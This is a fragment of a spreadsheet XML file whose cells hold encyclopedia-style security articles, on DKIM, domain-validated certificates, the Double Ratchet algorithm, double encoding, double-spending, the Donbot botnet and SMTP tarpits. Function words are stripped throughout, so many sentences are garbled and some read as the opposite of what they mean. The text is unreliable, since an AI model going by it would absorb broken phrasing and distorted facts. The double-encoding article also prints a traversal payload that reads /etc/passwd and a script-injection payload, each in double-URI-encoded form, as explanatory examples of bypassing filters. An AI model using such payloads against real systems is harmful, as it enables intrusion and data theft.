serious difficulties regaining control domains involved. icann since remedied situation requiring accredited registrars maintain customers' contact data escrow. event registrar loses accreditation, gtld domains along escrowed contact data transferred another accredited registrar.there several lawsuits namecheap, inc. role owner/registrant. also silverstein alivemax, angeles superior court case number bc480994 although case dismissed 2014. silverstein well known anti-spam email privacy campaigning, notably case william silverstein keynetics, inc., 17-15176 (9th cir. 2018) decided march 2018. also domain slamming internet privacy anonymity references external links zetter, march 2005). "domain owners lose privacy". wired.</t>
  </si>
  <si>
    <t>Domain-validated certificate</t>
  </si>
  <si>
    <t>domain validated certificate (dv) x.509 public certificate typically used transport layer security (tls) domain name applicant validated proving control domain. domain validated certificates first distributed geotrust 2002 becoming widely accepted method. issuing criteria sole criterion domain validated certificate proof control whois records, records file, email hosting account domain. typically control domain determined using following: response email sent email contact domain's whois details response email sent well-known administrative contact domain, e.g. (admin@, postmaster@, etc.) publishing record publishing nonce provided automated certificate issuing systema domain validated certificate distinct extended validation certificate requirement issuing certificate. particular, domain validated certificates assure particular legal entity connected certificate, even domain name imply particular legal entity controls domain. user interface 2020, major browsers user interfaces display certificates identically, provide options query type certificate multiple clicks. characteristics assurance requirements allow domain validated certificates issued quickly without requiring human intervention, domain validated certificates number unique characteristics: domain validated certificates used automated x.509 certificate issuing systems, let's encrypt. domain validated certificates often cheap free. domain validated certificates generated validated without documentation. most domain validated certificates issued instantly less minute) special tools automate issuing process. also let's encrypt references</t>
  </si>
  <si>
    <t>DomainKeys Identified Mail</t>
  </si>
  <si>
    <t>domainkeys identified mail (dkim) email authentication method designed detect forged sender addresses email (email spoofing), technique often used phishing email spam. dkim allows receiver check email claimed come specific domain indeed authorized owner domain. achieves affixing digital signature, linked domain name, outgoing email message. recipient system verify looking sender's public published dns. valid signature also guarantees parts email (possibly including attachments) modified since signature affixed. usually, dkim signatures visible end-users, affixed verified infrastructure rather message's authors recipients. dkim internet standard. defined 6376, dated september 2011; updates 8301 8463. overview need email validated identification arises forged addresses content otherwise easily created—and widely used spam, phishing email-based fraud. example, fraudster send message claiming sender@example.com, goal convincing recipient accept read email—and difficult recipients establish whether trust message. system administrators also deal complaints malicious email appears originated systems, not.dkim provides ability sign message, allows signer (author organization) communicate email considers legitimate. directly prevent disclose abusive behavior. dkim also provides process verifying signed message. verifying modules typically behalf receiver organization, possibly hop. independent simple mail transfer protocol (smtp) routing aspects, operates 5322 message—the transported mail's header body—not smtp "envelope" defined 5321. hence, dkim signatures survive basic relaying across multiple mtas. technical details signing signing organization direct handler message, author, submission site intermediary along transit path, indirect handler independent service providing assistance direct handler. signing modules insert dkim-signature: header fields, possibly behalf author organization originating service provider. specification allows signers choose header fields sign, from: field must always signed. resulting header field consists list tag=value parts example below: tags used are: relevant ones actual digital signature contents (headers body) mail message, body hash (optionally limited first octets body), signing domain, selector. agent user identifier (auid) optionally included. format email address optional local-part. domain must equal subdomain signing domain. semantics auid intentionally left undefined, used signing domain establish fine-grained sphere responsibility. both header body contribute signature. first, message body hashed, always beginning, possibly truncated given length (which zero). second, selected header fields hashed, order given repeated field names matched bottom header upward, order received: fields inserted header. non-existing field matches empty string, adding field name break signature. dkim-signature: field signature created, equal computed body hash equal empty string, implicitly added second hash, albeit name must appear does, refers another, preexisting signature. hashes, text canonicalized according relevant algorithms. result, encryption signer's private encoding using base64, addition list header fields listed list header fields (including field name value) present time signing provided this list need match list headers algorithms, fields, body length meant chosen assure unambiguous message identification still allowing signatures survive unavoidable changes going occur transit. end-to-end data integrity implied. verification receiving smtp server wanting verify uses domain name selector perform lookup. example, given example signature above: gives author domain verified against, example.net selector, brisbane. string _domainkey fixed part specification. this gives resource record looked brisbane._domainkey.example.net note selector domain name utf-8 internationalized email. case label must encoded according idna lookup. data returned query record also list tag-value pairs. includes domain's public key, along usage tokens flags (e.g. command line: nslookup -q=txt brisbane._domainkey.example.net) example: "k=rsa; t=s; p=migfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqddmzrmjrqxleuyyiymg4sua2sy mwr5mghpp9dint1hriwud/mzp1ro7kidtks8ttki6z6etrw9e9ddoxzsxnuxmume60cjbu08goyhpg3 gfwdg7qkdn6kr4v75mflw624vy35daxbvnltjtgrg/ew72o1diyvthkycgpsys8nmeqidaqab" receiver public (value tag) validate signature hash value header field, check hash value mail message (headers body) received. values match, cryptographically proves mail signed indicated domain tampered transit. signature verification failure force rejection message. instead, precise reasons authenticity message could proven made available downstream upstream processes. methods include sending back message, adding authentication-results header field message described 7001. patent although domainkeys covered u.s. patent 6,986,049, yahoo! licensed patent claims dual license scheme: domainkeys patent license agreement v1.2, general public license v2.0 (and version). relationship dmarc essence, dkim provide different measures email authenticity. dmarc provides ability organisation publish policy specifies mechanism (dkim, spf, both) employed sending email domain; check from: field presented users; receiver deal failures—and reporting mechanism actions performed policies. advantages primary advantage system e-mail recipients allowing signing domain reliably identify stream legitimate email, thereby allowing domain-based blacklists whitelists effective. this also likely make certain kinds phishing attacks easier detect. there incentives mail senders sign outgoing e-mail: allows great reduction abuse desk work dkim-enabled domains e-mail receivers dkim system identify forged e-mail messages claiming domain. domain owner focus abuse team energies users actually making inappropriate domain. spam filtering dkim method labeling message, filter identify spam. however, widespread dkim prevent spammers forging source address messages, technique commonly employ today. spammers forced show correct source domain, filtering techniques work effectively. particular, source domain feed reputation system better identify spam. conversely, dkim make easier identify mail known spam need filtered. receiving system whitelist known good sending domains, either locally maintained third party certifiers, skip filtering signed mail domains, perhaps filter remaining mail aggressively. anti-phishing dkim useful anti-phishing technology. mailers heavily phished domains sign mail show genuine. recipients take absence valid signature mail domains indication mail probably forged. best determine domains merit degree scrutiny remains open question. dkim used optional feature called adsp lets authors sign mail self-identify, demoted historic status november 2013. instead, dmarc used purpose allows domains self-publish techniques (including dkim) employ, makes easier receiver make informed decision whether certain mail spam not. example, using dmarc, ebay paypal publish policies mail authenticated, requesting receiving system, gmail, reject not. compatibility because implemented using records added 5322 header field, dkim compatible existing e-mail infrastructure. particular, transparent existing e-mail systems lack dkim support.this design approach also compatible other, related services, s/mime openpgp content-protection standards. dkim compatible dnssec standard spf. computation overhead dkim requires cryptographic checksums generated message sent mail server, results computational overhead otherwise required e-mail delivery. this additional computational overhead hallmark digital postmarks, making sending bulk spam (computationally) expensive. this facet dkim look similar hashcash, except receiver side verification negligible amount work, typical hashcash algorithm would require work. non-repudiability dkim's non-repudiation feature prevents senders (such spammers) credibly denying sent email. proven useful news media sources wikileaks, able leverage dkim body signatures prove leaked emails genuine tampered with—for example definitively repudiating claims hillary clinton's 2016 presidential election running mate kaine, chair donna brazile. weaknesses identifies number potential attack vectors.dkim signatures encompass message envelope, holds return-path message recipients. since dkim attempt protect mis-addressing, affect utility. number concerns raised refuted 2013 time standardization.a concern cryptographic solution would message replay abuse, bypasses techniques currently limit level abuse larger domains. replay inferred using per-message public keys, tracking queries keys filtering high number queries e-mail sent large mailing lists malicious queries actors. comparison different methods also addressing problem e-mail authentication. arbitrary forwarding mentioned above, authentication abuse prevention. evil email user reputable domain compose message dkim-signed sent domain mailbox retrieve file, obtain signed copy message. signatures makes doctoring messages even easier. signed copy forwarded million recipients, example botnet, without control. email provider signed message block offending user, cannot stop diffusion already-signed messages. validity signatures messages limited always including expiration time signatures, revoking public periodically upon notification incident. effectiveness scenario hardly limited filtering outgoing mail, implies ability detect message might potentially useful spammers. content modification dkim currently features canonicalization algorithms, simple relaxed, neither mime-aware. mail servers legitimately convert different character set, often document x-mime-autoconverted header fields. addition, servers certain circumstances rewrite mime structure, thereby altering preamble, epilogue, entity boundaries, breaks dkim signatures. only plain text messages written us-ascii, provided mime header fields signed, enjoy robustness end-to-end integrity requires. opendkim project organized data collection involving mail servers millions messages. 92.3% observed signatures successfully verified, success rate drops slightly (90.5%) mailing list traffic considered. annotations mailing lists problems might exacerbated filtering relaying software makes changes message. without specific precaution implemented sender, footer addition operated mailing lists many central antivirus solutions break dkim signature. possible mitigation sign designated number bytes message body. indicated dkim-signature header. anything added beyond specified length message body taken account calculating dkim signature. this work mime messages.another workaround whitelist known forwarders; e.g., spf. another workaround, proposed forwarders verify signature, modify email, re-sign message sender: header. however, solution risk forwarded third party signed messages received smtp receivers supporting 5617 adsp protocol. thus, practice, receiving server still whitelist known message streams. authenticated received chain (arc) email authentication system designed allow intermediate mail server like mailing list forwarding service sign email's original authentication results. this allows receiving service validate email email's dkim records rendered invalid intermediate server's processing. defined 8617, published july 2019, "experimental". short vulnerability october 2012, wired reported mathematician zach harris detected demonstrated email source spoofing vulnerability short dkim keys google.com corporate domain, well several high-profile domains. stated authentication 384-bit keys factored little hours laptop," 512-bit keys, hours cloud computing resources. harris found many organizations sign email short keys; factored notified organizations vulnerability. states 768-bit keys could factored access large amounts computing power, suggests dkim signing lengths greater 1,024. wired stated harris reported, google confirmed, began using longer keys soon disclosure. according 6376 receiving party must able validate signatures keys ranging bits 2048 bits, thus usage keys shorter bits might incompatible shall avoided. 6376 also states signers must keys least 1024 bits long-lived keys, though long-livingness specified there. history dkim resulted 2004 merging similar efforts, "enhanced domainkeys" yahoo "identified internet mail" cisco. this merged specification basis series ietf standards-track specifications support documents eventually resulted currently 6376. "identified internet mail" proposed cisco signature-based mail authentication standard, domainkeys designed yahoo verify domain e-mail sender message integrity. aspects domainkeys, along parts identified internet mail, combined create domainkeys identified mail (dkim). trendsetting providers implementing dkim include yahoo, gmail, fastmail. mail organizations carry dkim signature.discussions dkim signatures passing indirect mail flows, formally dmarc working group, took place right first adoptions protocol wreaked havoc regular mailing list use. however, none proposed dkim changes passed. instead, mailing list software changed.in 2017, another working group launched, dkim crypto update (dcrup), specific restriction review signing techniques. 8301 issued january 2018. bans sha-1 updates sizes (from 512-2048 1024-4096). 8463 issued september 2018. adds elliptic curve algorithm existing rsa. added type, k=ed25519 adequately strong featuring short public keys, easily publishable dns. development original domainkeys designed mark delany yahoo! enhanced comments many others since 2004. specified historic 4870, superseded standards track 4871, domainkeys identified mail (dkim) signatures; published 2007. number clarifications conceptualizations collected thereafter specified 5672, august 2009, form corrections existing specification. september 2011, 6376 merged updated latter documents, preserving substance dkim protocol. public compatibility earlier domainkeys also possible. dkim initially produced informal industry consortium submitted enhancement standardization ietf dkim working group, chaired barry leiba stephen farrell, eric allman sendmail, callas corporation, mark delany miles libbey yahoo!, fenton michael thomas cisco systems attributed primary authors. source code development common library opendkim project, following recent protocol additions, licensing license. also authenticated received chain (arc) author domain signing practices bounce message context filtering dmarc (domain-based message authentication, reporting conformance) domainkeys email authentication openpgp s/mime sender policy framework (spf) vouch reference references further reading 4686 analysis threats motivating domainkeys identified mail (dkim) 4871 domainkeys identified mail (dkim) signatures proposed standard 5617 domainkeys identified mail (dkim) author domain signing practices (adsp) 5585 domainkeys identified mail (dkim) service overview 5672 4871 domainkeys identified mail (dkim) signatures—update 5863 dkim development, deployment, operations 6376 domainkeys identified mail (dkim) signatures draft standard 6377 domainkeys identified mail (dkim) mailing lists 8301 cryptographic algorithm usage update domainkeys identified mail (dkim) 8463 cryptographic signature method domainkeys identified mail (dkim) external links domainkeys identified mail (dkim)</t>
  </si>
  <si>
    <t>DomainKeys</t>
  </si>
  <si>
    <t>domainkeys (informally deprecated e-mail authentication system designed yahoo verify domain name e-mail sender message integrity. aspects domainkeys, along parts identified internet mail, combined create domainkeys identified mail (dkim), widely used.both domainkeys dkim published 2007, domainkeys "historical" protocol, dkim standards-track replacement. also sender author domain signing practices sender policy framework (spf) references external links dkim.org (dkim resources website: implementations, faq, news). ietf dkim working group (started 2006). yahoo!'s description domainkeys (historical; archived original 2007-10-18). yahoo!'s statement claimed dkim draft domainkey library implementor's tools (yahoo!'s historical free software reference implementation domainkeys). u.s. patent 6,986,049 spamcop faq: auto responders bad? (faq entry bogus bounces, also discusses domainkeys).</t>
  </si>
  <si>
    <t>Tamarin Prover</t>
  </si>
  <si>
    <t>tamarin prover computer software program formal verification cryptographic protocols. used verify transport layer security 1.3, iso/iec 9798, dnp3 secure authentication references external links tamarin prover official website david wong created introductory video tamarin prover.</t>
  </si>
  <si>
    <t>Donbot botnet</t>
  </si>
  <si>
    <t>donbot, also known aliases buzus bachsoy, botnet mostly involved sending pharmaceutical stock-based e-mail spam.the donbot botnet thought consist roughly 125,000 individual computers, combined send million spam messages day. this amount equals 1.3% estimated total global spam volume billion messages day, though botnet known spikes accounted total spam volume. also malware internet crime internet security internet spam references</t>
  </si>
  <si>
    <t>Double Ratchet Algorithm</t>
  </si>
  <si>
    <t>cryptography, double ratchet algorithm (previously referred axolotl ratchet) management algorithm developed trevor perrin moxie marlinspike 2013. used part cryptographic protocol provide end-to-end encryption instant messaging. after initial exchange manages ongoing renewal maintenance short-lived session keys. combines cryptographic so-called "ratchet" based diffie–hellman exchange (dh) ratchet based derivation function (kdf), hash function, therefore called double ratchet. algorithm considered self-healing certain conditions prevents attacker accessing cleartext future messages compromised user's keys. session keys exchanged rounds communication. this effectively forces attacker intercept communication honest parties, since lose access soon exchange occurs intercepted. this property later named future secrecy, post-compromise security. etymology "axolotl" reference salamander's self-healing properties. term "ratchet" cryptography used analogy mechanical ratchet. mechanical sense, ratchet allows advancement direction; cryptographic ratchet allows keys generated previous key. unlike circular ratchet, however, state unique. origin double ratchet algorithm developed trevor perrin moxie marlinspike (open whisper systems) 2013 introduced part signal protocol february 2014. double ratchet algorithm's design based ratchet introduced off-the-record messaging (otr) combines symmetric-key ratchet modeled silent circle instant messaging protocol (scimp). ratchet initially named critically endangered aquatic salamander axolotl, extraordinary self-healing capabilities. march 2016, developers renamed axolotl ratchet double ratchet algorithm better differentiate ratchet full protocol, used name axolotl referring signal protocol. properties double ratchet algorithm features properties commonly available end-to-end encryption systems long time: encryption contents entire transport well authentication remote peer protection manipulation messages. hybrid ratchets, combines several desired features principles. from messaging takes properties forward secrecy automatically reestablishing secrecy case compromise session key, forward secrecy compromise secret persistent main key, plausible deniability authorship messages. additionally, enables session renewal without interaction remote peer using secondary ratchets. additional key-derivation step taken enable retaining session keys out-of-order messages without endangering following keys. said detect reordering, deletion, replay sent messages, improve forward secrecy properties comparison messaging. combined public infrastructure retention pregenerated one-time keys (prekeys), allows initialization messaging sessions without presence remote peer (asynchronous communication). usage triple diffie–hellman exchange (3-dh) initial exchange method improves deniability properties. example signal protocol, combines double ratchet algorithm, prekeys, 3-dh handshake. protocol provides confidentiality, integrity, authentication, participant consistency, destination validation, forward secrecy, backward secrecy (aka future secrecy), causality preservation, message unlinkability, message repudiation, participation repudiation, asynchronicity. provide anonymity preservation, requires servers relaying messages storing public material. functioning client renews session material interaction remote peer using diffie–hellman ratchet whenever possible, otherwise independently using hash ratchet. therefore, every message client using double ratchet advances hash ratchets (one sending, receiving) seeded common secret ratchet. time tries every opportunity provide remote peer public value advance ratchet whenever value remote peer arrives. soon common secret established, hash ratchet gets initialized. cryptographic primitives, double ratchet algorithm uses ratchet elliptic curve diffie–hellman (ecdh) curve25519, message authentication codes (mac, authentication) keyed-hash message authentication code (hmac) based sha-256, symmetric encryption advanced encryption standard (aes), partially cipher block chaining mode (cbc) padding pkcs partially counter mode (ctr) without padding, hash ratchet hmac. applications following list applications double ratchet algorithm custom implementation notes references literature external links specification open whisper systems "advanced cryptographic ratcheting", abstract description moxie marlinspike olm: implementation apache license</t>
  </si>
  <si>
    <t>Double encoding</t>
  </si>
  <si>
    <t>double encoding encoding data twice using encoding scheme. usually used attack technique bypass authorization schemes security filters intercept user input. double encoding attacks security filters, characters payload considered illegal filters replaced double-encoded form. double uri-encoding special type double encoding data uri-encoded twice row. used bypass authorization schemes security filters code injection, directory traversal, cross-site scripting (xss) injection. description double encoding, data encoded twice using encoding scheme, double-encoded form data encode(encode(x)) encode encoding function.double encoding usually used attack technique bypass authorization schemes security filters intercept user input. double encoding attacks security filters, characters payload considered illegal filters replaced double-encoded form. double-encoded payload decoded security filters, single-encoded payload observed filters, level encoding still present, considered illegal filters pass them, later target system might perform another round decoding results attacker-intended payload, something filters would considered illegal. double uri-encoding double uri-encoding, also referred double percent-encoding, special type double encoding data uri-encoded twice row. words, double-uri-encoded form data uri-encode(uri-encode(x)). example calculating double-uri-encoded form first uri-encoded turn uri-encoded %253c, double-uri-encode(&lt;) uri-encode(uri-encode(&lt;)) uri-encode(%3c) %253c. another example, calculating double-uri-encoded form ../, first uri-encoded %2e%2e%2f turn uri-encoded %252e%252e%252f, double-uri-encode(../) uri-encode(uri-encode(../)) uri-encode(%2e%2e%2f) %252e%252e%252f.double-uri-encoding usually used attack technique applications browsers bypass authorization schemes security filters intercept user input. example uri-encoded form used directory traversal attacks, usually considered illegal security filters. however, still possible %252e, double-uri-encoded form considered illegal security filters hence pass them, later target system building path related directory traversal attack might double-uri-decoded form %252e, something filters would considered illegal.double uri-encoding attacks used bypass authorization schemes security filters code injection, directory traversal, injection. prevention decoding user input twice using decoding scheme, authorization scheme security filter, allow double encoding attacks bypass authorization scheme security filter occur decoding operation. thus, prevent double encoding attacks, decoding operations user input occur authorization schemes security filters intercept user input. examples programming language, $_get $_request already uri-decoded thus programmers avoid calling urldecode function data read them. calling urldecode function data read $_get $_request causes data uri-decoded hence open possibility double encoding attacks. directory traversal following program, value $_get["name"] used build path file sent user. this opens possibility directory traversal attacks incorporate payload http parameter name. security filter directory traversal attacks, program searches value reads $_get["name"] directory traversal sequences exits finds one. however, filter, program uri-decodes data read $_get["name"], makes vulnerable double encoding attacks. this filter prevents payloads ../../../../etc/passwd uri-encoded form %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd. however, %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd, double-uri-encoded form ../../../../etc/passwd, bypass filter. when double-uri-encoded payload %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd used, value $_get["file"] %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd contain directory traversal sequence thus passes filter given urldecode function returns ../../../../etc/passwd, resulting successful attack. following program, value $_get["name"] used build message shown user. this opens possibility attacks incorporate payload http parameter name. security filter attacks, program sanitizes value reads $_get["name"] htmlentities function. however, filter, program uri-decodes data read $_get["name"], makes vulnerable double encoding attacks. this filter prevents payloads &lt;script&gt;alert(1)&lt;/script&gt; uri-encoded form %3cscript%3ealert%281%29%3c%2fscript%3e. however, %253cscript%253ealert%25281%2529%253c%252fscript%253e, double-uri-encoded form &lt;script&gt;alert(1)&lt;/script&gt;, bypass filter. when double-uri-encoded payload %253cscript%253ealert%25281%2529%253c%252fscript%253e used, value $_get["name"] %3cscript%3ealert%281%29%3c%2fscript%3e remains unaffected htmlentities function thus passed urldecode function returns &lt;script&gt;alert(1)&lt;/script&gt;, resulting successful attack. references external links "double encoding". owasp.org. retrieved july 2022. "capec-120: double encoding". capec.mitre.org. retrieved july 2022. "cwe-174: double decoding same data". cwe.mitre.org. retrieved july 2022.</t>
  </si>
  <si>
    <t>Double switching</t>
  </si>
  <si>
    <t>double switching, double cutting, double breaking practice using multipole switch close open positive negative sides electrical circuit, neutral sides circuit. this technique used prevent shock hazard electric devices connected unpolarised power plugs sockets. double switching crucial safety engineering practice railway signalling, wherein used ensure single false feed current relay unlikely cause wrong-side failure. example using redundancy increase safety reduce likelihood failure, analogous double insulation. double switching increases cost complexity systems employed, example extra relay contacts extra relays, technique applied selectively provide cost-effective safety improvement. examples landslip washaway detectors landslip washaway detector buried earth embankment, opens circuit landslide occur. possible guarantee earth embankment complete circuit supposed break. circuit double positive negative wires, conductive earth likely blow fuse hand, short detecting relay hand, either almost certain apply correct warning signal. accidents clapham clapham junction rail crash 1988 caused part lack double switching (known "double cutting" british railway industry). signal relay question switched side, return current came back unswitched wire. loose wire bypassed contacts train detection relays switched signal, allowing signal show green fact stationary train ahead. people killed resultant collision. united flight similar accident united airlines flight caused part single-switched safety circuit baggage door mechanism. failure wiring insulation circuit allowed baggage door unlocked false feed, leading catastrophic de-pressurisation, deaths nine passengers. signalling study railway electrical signalling south wales 1900s, shows ever increasing proportion double switching compared single switching. double switching course cost wires, relay contacts, testing. hand double switching inherently less prone wrong side failures; helps overcome short-circuit faults hard test for. partial double switching might double switch lever controls, track circuits signal next, single switching track circuits less critical overlap beyond next signal. double switching facilitated modern relays contacts less space: pre-1950 shelf type relay contacts (front (make) back (break)) full size post-1950 q-type plug relay contacts (front (make) back (break)) half size also redundancy (engineering) double insulation single-wire earth return references</t>
  </si>
  <si>
    <t>Double-spending</t>
  </si>
  <si>
    <t>double-spending potential flaw digital cash scheme single digital token spent once. unlike physical cash, digital token consists digital file duplicated falsified. counterfeit money, double-spending leads inflation creating amount copied currency previously exist. this devalues currency relative monetary units goods diminishes user trust well circulation retention currency. fundamental cryptographic techniques prevent double-spending, preserving anonymity transaction, blind signatures and, particularly offline systems, secret splitting. centralized currencies prevention double-spending usually implemented using online central trusted third party verify whether token spent. this normally represents single point failure availability trust viewpoints. decentralized currencies decentralized system, double-spending problem significantly harder solve. avoid need trusted third party, many servers must store identical up-to-date copies public transaction ledger, transactions (requests spend money) broadcast, arrive server slightly different times. transactions attempt spend token, server consider first transaction sees valid, invalid. once servers disagree, determine true balances, server's observations considered equally valid. most decentralized systems solve consensus algorithm, bring servers back sync. notable types consensus mechanisms proof-of-work proof-of-stake. 2007, number distributed systems prevention double-spending proposed.the cryptocurrency bitcoin implemented solution early 2009. cryptographic protocol used proof-of-work consensus mechanism transactions batched blocks chained together using linked list hash pointers (blockchain). server produce block solving computationally difficult puzzle (specifically finding partial hash collision) called mining. block commits entire history bitcoin transactions well incoming transactions. miner rewarded bitcoins solving double-spending problem persists, however, blocks (with conflicting transactions) mined approximate time. when servers inevitably disagree order blocks, keep blocks temporarily. blocks arrive, must commit history other, eventually single chain continue other(s) not. since longest (more technically "heaviest") chain considered valid data set, miners incentivized build blocks longest chain know order become part dataset (and reward valid). transactions system therefore never technically "final" conflicting chain blocks always outgrow current canonical chain. however, blocks built transaction, becomes increasingly unlikely/costly another chain overtake attack total computational power decentralized proof-of-work system computational power nodes, differ significantly hardware used. larger computational power increases chance mining reward block mined, creates incentive accumulate clusters mining nodes, mining pools. pool achieves hashing power effectively overturn network transactions, resulting double spending. bitcoin forks, bitcoin gold, attack 2018 2020.a given cryptocurrency's susceptibility attack depends existing hashing power network since attacker needs overcome attack economically viable, market currency must sufficiently large justify cost rent hashing power.in 2014, mining pool ghash.io obtained hashing power bitcoin raised significant controversies safety network. pool voluntarily capped hashing power 39.99% requested pools follow order restore trust network. also double spend attacks ethereum classic. references</t>
  </si>
  <si>
    <t>Draft:Marshall Inu</t>
  </si>
  <si>
    <t>marshall token (ticker: mri) cryptocurrency launched february 2022 ethereum blockchain offers financial professional mixed martial arts fighters martial arts gyms. organization supporting fighters fight fair payment. history marshall launched february 2022 erc-20 token ethereum blockchain crypto developer using pseudonymous bryce paul. cryptocurrency project first started satirical token originally named marshall rogan inu, golden retriever ultimate fighting championship commentator rogan, "marshall rogan" shiba inu. marshall rogan considerable fanbase social media. fight fans quickly became confused rogan's involvement project. effort avoid liabilities, administrators removed rogan project's name shortly organization's website went offline leading speculations legal troubles using announcer's name.in early 2022, exchange price cryptocurrency increased 262% week briefly peaked $0.199/token march putting total market capitalization near $200 million. march, 2022, marshall reached total $800,000 distributed fighters. incident march 2022, 272, cryptocurrency mentionned post-fight victory speeches inside ultimate fighting championship octagon, interviewed rogan owner dog. with advertisers paying millions dollars airtime, experts deemed marketing stunt unlikely reproduced again. cryptocurrency sponsored fighters featured card, including main event fighters colby covington jorge masvidal. event took place vegas, nevada, shortly beginning russian invasion ukraine, ukrainian flyweight fighter maryna moroz defeated opponent mariya agapova. considering moroz fighting fighter russian origin, fight fans eagerly awaiting post-fight speech. however, midst moment, moroz took rogan thanked marshall rogan inu. fighters relief organization deployed payment contracts ethereum blockchain sends funds generated transactions marketing wallet awards fighters monetary sponsorships mitigate fighters controversy. shares estimated revenue fighters, significantly lower others sports leagues nba, nhl, share approximately half revenue athletes. 2014, signed controversial rebook deal sparked considerable unsatisfaction among fighters worsened ability monetize personal brands. wages average fighters pushes many keep regular joining promotion. many athletes francis ngannou reported difficulty paying training camp expenses flyweight sarah alpar even creating gofundme campaign 2021, order training costs.in addition ufc’s fight night performance bonuses, cryptocurrency introduced community bonuses handed ethereum. according espn analyst former fighter chael sonnen, cryptocurrency "game changer" relations effect fighters pay. march 2022, marshall paid middleweight fighter heinisch's $25,000 stem-cell surgery mexico, currently legal united states. middleweight kelvin gastelum scheduled compete 272, forced knee injury. cryptocurrency assisted gastelum financially following meniscus surgery. criticism marshall inu's origin "meme coin" made difficult taken seriously mainstream media financial experts early days, however, project fact distributing funds fighters. creators behind project anonymous, required kyc, regulatory rule referred know customer, token listed cryptocurrency exchanges.in march 2022, fighting social media director eric jackman criticized cryptocurrency hour, stating felt coin “selfishly motivated” adding “why help fighters? need coin give fighter money?” jackman said. following price drop, former championship fighter askren also mouthed price fluctuations token well suggesting pump dump. bellator middleweight champion johnny eblen explained fighting podcast, turned sponsorship marshall stating cryptocurrency flag, seems "building hype", adding project meme coin real case" suspecting might pump dump. also meme coin dogecoin shiba references external links official website marshall instagram marshall twitter</t>
  </si>
  <si>
    <t>Tarpit (networking)</t>
  </si>
  <si>
    <t>tarpit service computer system (usually server) purposely delays incoming connections. technique developed defense computer worm, idea network abuses spamming broad scanning less effective, therefore less attractive, take long. concept analogous pit, animals bogged slowly sink surface, like swamp. original tarpit idea liston developed original tarpitting program labrea. protect entire network tarpit single machine. machine listens address resolution protocol requests unanswered (indicating unused addresses), replies requests, receives initial packet scanner sends syn/ack response. open socket prepare connection, fact forget connection sending syn/ack. however, remote site sends (which gets ignored) believes 3-way-handshake complete. then starts send data, never reaches destination. connection time while, since system believes dealing live (established) connection, conservative timing instead retransmit, back-off, retransmit, etc. quite while. later versions labrea also added functionality reply incoming data, using packets sockets resources tarpit server, bogus packets request sending site "slow down". this keep connection established waste even time scanner. smtp tarpits possible avenues considered battle bulk-spam time, mandate small every submitted mail. introducing artificial cost, negligible impact legitimate long small enough, automated mass-scale spam would instantly become unattractive. tarpitting could seen similar (but technically much less complex) approach, cost spammer would measured terms time efficiency rather money. authentication procedures increase response times users attempt invalid passwords. smtp authentication exception. however, server-to-server smtp transfers, spam injected, require authentication. various methods discussed implemented smtp tarpits, systems plug mail transfer agent (mta, i.e. mail server software) front proxy. method increases transfer time mails seconds delaying initial greeting message ("greet delay"). idea matter legitimate mail takes little longer deliver, high volume, make difference spammers. downside mailing lists legitimate mass-mailings explicitly whitelisted suffer, too. some email systems, sendmail 8.13+, implement stronger form greet delay. this form pauses connection first established listens traffic. detects traffic prior greeting violation 2821) closes connection. since many spammers write smtp implementations specification, reduce number incoming spam messages. another method delay known spammers, e.g. using blacklist (see spamming, dnsbl). openbsd integrated method core system since openbsd 3.3, special-purpose daemon (spamd) functionality firewall (pf) redirect known spammers tarpit. exchange tarpit senders send invalid address. exchange smtp connector connected authentication system. subtle idea greylisting, which, simple terms, rejects first connection attempt previously-unseen address. assumption spammers make connection attempt attempts short period time) send message, whereas legitimate mail delivery systems keep retrying longer period. after retry, eventually allowed without impediments. finally, elaborate method tries glue tarpits filtering software together, filtering e-mail realtime, transmitted, adding delays communication response filter's "spam likeliness" indicator. example, spam filter would make "guess" line every bytes received likely message going spam. likely delay transmission. background smtp consists requests, mostly four-letter words mail, replies, (minimally) three-digit numbers. last line reply, number followed space; preceding lines followed hyphen. thus, determining message attempted send spam, mail server reply: 451-ophiomyia prima agromyzid 451-ophiomyia secunda agromyzid 451-ophiomyia tertia agromyzid 451-ophiomyia quarta agromyzid 451-ophiomyia quinta agromyzid 451-ophiomyia sexta agromyzid 451-ophiomyia septima agromyzid your address listed dnsbl. please later. tarpit waits fifteen seconds lines (long delays allowed smtp, humans sometimes send mail manually test mail servers). this ties smtp sending process spammer's computer limit amount spam send. ip-level tarpits linux kernel patched allow tarpitting incoming connections instead usual dropping packets. this implemented iptables addition tarpit target. packet inspection matching features applied tarpit targets applied targets. mixed smtp-ip level tarpits server determine given mail message spam, e.g. addressed spam trap, trusted users' reports. server decide address responsible submitting message deserves tarpitting. cross-checking available dnsbls help avoid including innocent forwarders tarpit database. daemon exploiting linux libipq check remote address incoming smtp connections database. spamcannibal software designed around idea; stockade similar project implemented using freebsd ipfirewall. advantage tarpitting level regular connections handled stateful. that although much sleeps, still uses amount memory required hold state connection. opposite, labrea-style tarpitting stateless, thus gaining advantage reduced cost spammer's box. however, noted making botnets, spammers externalize computer-resource costs. criticism known tarpitted connection generate significant amount traffic towards receiver, sender considers connection established tries send (and retransmit) actual data. practice, given current average computer botnet size, reasonable solution drop suspicious traffic completely, without tarpitting. this way, segments retransmitted, whole http https requests. commercial implementations tar-pitting well exchange, successful commercial implementations idea. first developed turntide, philadelphia-based startup company, acquired symantec 2004 million cash. turntide anti spam router contains modified linux kernel allows play various tricks traffic, varying window size. grouping various email senders different traffic classes limiting bandwidth class, amount abusive traffic reduced particularly abusive traffic coming single sources easily identified high traffic volume. after symantec acquisition, canadian startup company called mailchannels released "traffic control" software, uses slightly different approach achieve similar results. traffic control semi-realtime smtp proxy. unlike turntide appliance, applies traffic shaping network layer, traffic control applies traffic shaping individual senders application layer. this approach results somewhat effective handling spam traffic originating botnets allows software slow traffic individual spam zombies, rather requiring zombie traffic aggregated class. also turing tarpit anti-spam techniques (e-mail) mail-sink references</t>
  </si>
  <si>
    <t>Tapandegan</t>
  </si>
  <si>
